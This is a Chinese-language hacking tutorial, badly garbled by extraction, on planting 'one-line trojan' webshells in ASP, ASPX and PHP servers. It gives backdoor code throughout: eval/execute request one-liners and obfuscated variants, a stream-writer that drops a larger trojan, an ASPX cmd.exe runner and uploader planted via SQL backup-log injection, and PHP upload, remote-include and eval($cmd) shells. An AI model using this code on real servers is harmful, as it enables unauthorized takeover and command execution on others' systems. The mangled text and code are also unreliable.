一句话木马的原理及利用

1、一句话木马的原理及利用(asp,aspx,php,jsp) 一句话木马的适用环境：1服务器的来宾账户有写入权限已知数据库地址且数据库格式为asa或asp在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可一句话木马的工作原理：一句话木马服务端(本地的html提交文件)就是我们要用来插入到asp文件中的asp语句，(不仅仅是以asp为后缀的数据库文件)，该 语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代 码内容为 v%execute request(value)% 其中value可以自己修改一句话木马客户端(远程服务器上被插入一句话的as

2、p文件)用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也 就是生成我们所需要的asp木马文件现在先假设在远程主机的TEXT.ASP(客户端)中已经有了v%execute request(value)%这个 语句.)在ASP里v%execute )%意思是执行省略号里的语句.那么如果我写进我们精心构造的语句，它也是会帮我们执行的就按照这上面的思路，我们就可以在本地构造一个表 单内容如下:(/为注释)vform action=http:主机路 径/TEXT.asp method=postset lP=server.createObject(Adodb.Stream

3、)/建立流对象lP.Open /打开lP.Type=2 /以文本方式lP.CharSet=gb2312 /字体标准lP.writetext request(newvalue)lP.SaveToFile server.mappath(newmm.asp),2 /将木马 内容以覆盖文件的方式写入 newmm.asp, 2就是已覆 盖的方式lP.Close 关闭对象set lP=nothing 释放对象response.redirect newmm.asp /转向 newmm.asp 添 入生成 木马的 内容 v/textareavBRvcentervbr表单的作用就是把我们表单里的内容提交到远程主

4、机的 TEXT.ASP这个文件.然后因为 TEXT.ASP里有v%execute request(value)%这句，那么这句代码就会执行我们从表单里传 来的内容哦.(表单名必须和v%execute request(value)%里的VALUE 一样，就是我用蓝色标 记的那两处，必须相等)说到这里大家是不是清楚了 我们构造了两个表单，第一个表单里的代码是文件操作的代码 (就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处 理代码)那么第二个表单当然就是我们要写入的马了.具体的就是下面这一段：set lP=server.createObject(Adodb

5、.Stream)/建立流对象lP.Open /打开lP.Type=2 /以文本方式lP.CharSet=gb2312 /字体标准 lP.writetext request(newvalue)lP.SaveToFile server.mappath(newvalue.asp),2 / 将木马 内容以覆盖文 件的方式写入 newmm.asp, 2就是已覆 盖的方式lP.Close 关闭对象set lP=nothing 释放对象response.redirect newmm.asp /转向 newmm.asp这样的话第二个表单的名字必须和lP.writetext request(newvalue)里

6、的Newvalue 一样，就是 我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。关于服务器错误：经常,当我们在一个asp文件内添加了一句话后，就会出现类型不匹配的错误：Script error detected at line 1.Source line: execute request(nettoo)Description:类型不匹配：execute这个如何解决呢？想出了一个好办法,只要用eval 替换掉execute 服务端，就不会出错了！用一句话客户端连接，加入容错语句，你可以把它插入到任何

7、ASP文件而不会像以前一样 出错。常见asp 一句话木马的变体: v%set ms = server.CreateObject(MSScriptControl.ScriptControl.l)ms.Language=VBScriptms.AddObject Response, Responsems.AddObject request, requestms.AddObject session, sessionms.AddObject server, serverms.AddObject application, applicationms.ExecuteStatement (ex &ecute(

8、request(chr(35)%v%ExecuteGlobal request(chr(35)%v%ExecuteGlobal request(chr(35)%if request(chr(35) thenExecuteGlobal request(chr(35) 9 月 30 日数据库里插入枷数畣整燿焕敌瑳v IT忾utf-7的马 v%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%v% LANGUAGE = VBScript.Encode %v%#PgAAAA=r6P.;!

9、+/D14D v&X#*!*ErPPD4+P2XED+VVG4Cs,Dn;!n/DA4M & Xb*oBMAAA=A#%各种环境下的一句话木马：aspx1相当于ASP的一句话木马：程序代码alter database pubs set RECOVERY FULL-create table pubs.dbo.cmd(a image)backup log pubs to disk = c:TM with initinsert into pubs.dbo.cmd(a) values (v%System.IO.StreamWriterow=newSystem.IO.StreamWriter(Serve

10、r.MapPath(images.aspx),false);ow.Write(Request.Paramsl);o w.Close()% )backup log pubs to disk = d:test11.aspx这个和asp的一样，客户端post 一个变量1把木马代码丢在变量l里面就ok 了这个是类 似asp的一句话木马。/mu.aspx.htm 客户端:(提交后访问: HYPERLINK http:/IP/images.aspx http:/IP/images.aspx)vform action= HYPERLINK 00/asp/mu.aspx 00/asp/mu.aspx meth

11、od=postvb在下面输入大马内容:v/bxbrSub RunCmd(Src As Object, E As EventArgs)Dim myProcess As New Process()Dim myProcessStartInfo As New ProcessStartlnfo(xpath.Text) myProcessStartInfo.UseShellExecute = False myProcessStartInfo.RedirectStandardOutput = true myProcess.StartInfo = myProcessStartInfomyProcessStar

12、tInfo.Arguments=xCmd.textmyProcess.Start()Dim myStreamReader As StreamReader = myProcess.StandardOutputDim myString As String = myStreamReader.Readtoend()myProcess.Close()mystring=replace(mystring,)result.text= vbcrlf & vpre & mystring & End Subv/scriptxhtmlvheadvtitleASP.NET Shell for WebAdmin2.X F

13、inalv/titlevmeta http-equiv=Content-Type c /v/headvbodyvform runat=servervasp:Labelid=L_pstyle=COLOR:#OOOOffrunat=serverwidth=80px;Programv/asp:Labelvasp:TextBox id=xpath style=BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px

14、solid runat=server Width=300pxc:windowssystem32cmd.exev/asp:TextBoxvbr /Arguments/c net userv/pv/formv/bodyv/htmlv/textareavBRvcentervbrprivate void bc(object o,EventArgse)stringu=files;stringfilename;intpos=f.PostedFile.FileName.LastIndexOf();filename=f.PostedFile.FileName.Substring(pos + 1);f.Post

15、edFile.SaveAs(Server.MapPath(u)+filename);v/scriptvform method=post runat=server)backup log pubs to disk = c:inetpubwwwroottest11.aspxPHP本文没有什么特别之处，仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。 刚学PHP没几天，我就急于功成，所以有错误及不足之处请大家积极指出。PHP语法的强大是ASP望尘莫及的，仅一个:v? phpinfo();?就可以刺探整个服务器的配置。 运行cmd,上传文件等，都是非常简便的，现在用的好的PHP木马，莫过于ang

16、el的phpspy 了。昨天hak_ban问怎么给PHP木马加密，我还没想到，但是对于写一个微型PHP木马， 我想还是很难被杀的。这里简单探讨一下几个函数可以作为木马的使用：可以运行外部命令的几个函数：system,passthru,exec,shell_exec,popen。例：只要将等保存为cmd.php及可实现运行外部命令的功能。这几个函数 可以说是最早的微行php木马了，所以一般虚拟主机的设置也会将这些函数屏蔽的。还记得WDB论坛的style.php的漏洞吗？我们可以利用这个做个很难被杀的小木马。如 下：将其保存为1.php，我们就可以调用其他不支持php服务器里的.php木马(如ph

17、pspy.php) 来达至U我们的 目的： HYPERLINK http:/target.eom/1.php http:/target.eom/1.php? Include= HYPERLINK /phpspy.php /phpspy.php 这里是不支持php 的,否则将会在这台服务器运行 phpspy.php,而不是目标服务器。这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马，我没有改： v?copy($_FILESMyFiletmp_name,$_FILESMyFilename);?将其保存为up.php后，在本地提交表单：vform ENCTYPE=mul

18、tipart/form-data ACTION=http: 目标服务器 /up.php METHOD=POSTvinput NAME=MyFile TYPE=filevinput VALUE=提交 ” TYPE=submitv/form就可以把大个的php木马上传上去。我一直在想有没有同冰狐浪子的那个ASP句话木马一样通过本地表单提交运行的PHP 木马。终于找到了函数：eval，在PHP4中文参考手册上它的语法说明：语法:void eval(string code_str);内容说明：本函数可将字符串之中的变量值代入，通常用在处理数据库的资料上。参数 code_str为欲处理的字符串。值的 注意的是待处理的字符串要符合PHP的字符串格式， 同时在结尾处要有分号。使用本函数处理后的字符串会沿续到PHP程序结束。我们可以在目标主机上保存:v?eval($cmd);?为一个PHP文件